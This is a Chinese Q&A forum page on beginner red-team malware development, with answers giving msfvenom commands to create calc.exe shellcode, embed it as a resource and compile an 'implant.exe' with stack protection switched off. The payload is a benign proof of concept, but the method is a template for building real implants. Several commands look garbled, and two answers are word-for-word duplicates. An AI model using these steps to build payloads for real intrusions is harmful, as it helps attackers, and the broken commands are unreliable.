10 红队技术:恶意程序开发初级篇1-payload载入点
- 分类:区块链安全
最佳答案 2023-09-04 13:11
- 使用msfvenom生成payload文件,命令如下:
msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin
其中,windows/x64/exec表示使用64位Windows系统执行命令的payload,CMD=calc.exe表示要执行的命令为打开计算器,-f raw表示输出为二进制文件,-o calc.bin表示输出文件名为calc.bin。
- 将payload文件转换为资源文件,命令如下:
bin2res calc.bin calc.rc PAYLOAD
其中,calc.bin为上一步生成的payload文件,calc.rc为输出的资源文件名,PAYLOAD为资源类型。
- 将资源文件转换为目标格式,命令如下:
windres calc.rc calc.res
其中,calc.rc为上一步生成的资源文件,calc.res为输出的目标格式文件。
- 将目标格式文件链接到源文件中,生成可执行文件,命令如下:
cvtres /MACHINE:x64 /OUT:resources.o calc.res cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tc implant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
其中,resources.o为第三步生成的目标格式文件,implant.cpp为包含执行payload的源文件,implant.exe为输出的可执行文件。
执行完以上步骤后,就可以得到一个可以打开计算器的payload文件和可执行文件了
其它 3 个回答
试试 msfvenom -p windows/exec CMD=calc.exe -f raw -o calc.ico
运行msfvenom,使用以下命令生成计算器的payload文件:
msfvenom -p windows/x64/exec CMD=calc.exe -f exe -o calc.ico
将生成的 calc.ico 文件转换成 object 文件。在命令行中输入以下指令:
cvtres /MACHINE:x64 /OUT:resources.o calc.ico
接着编译 implant.cpp 源文件,并将 resources.o 文件链接进来,生成可执行文件。在命令行中输入以下指令:
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tc implant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
最后,运行 implant.exe 文件即可打开计算器
运行msfvenom,使用以下命令生成计算器的payload文件:
msfvenom -p windows/x64/exec CMD=calc.exe -f exe -o calc.ico
将生成的 calc.ico 文件转换成 object 文件。在命令行中输入以下指令:
cvtres /MACHINE:x64 /OUT:resources.o calc.ico
接着编译 implant.cpp 源文件,并将 resources.o 文件链接进来,生成可执行文件。在命令行中输入以下指令:
cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tc implant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
最后,运行 implant.exe 文件即可打开计算器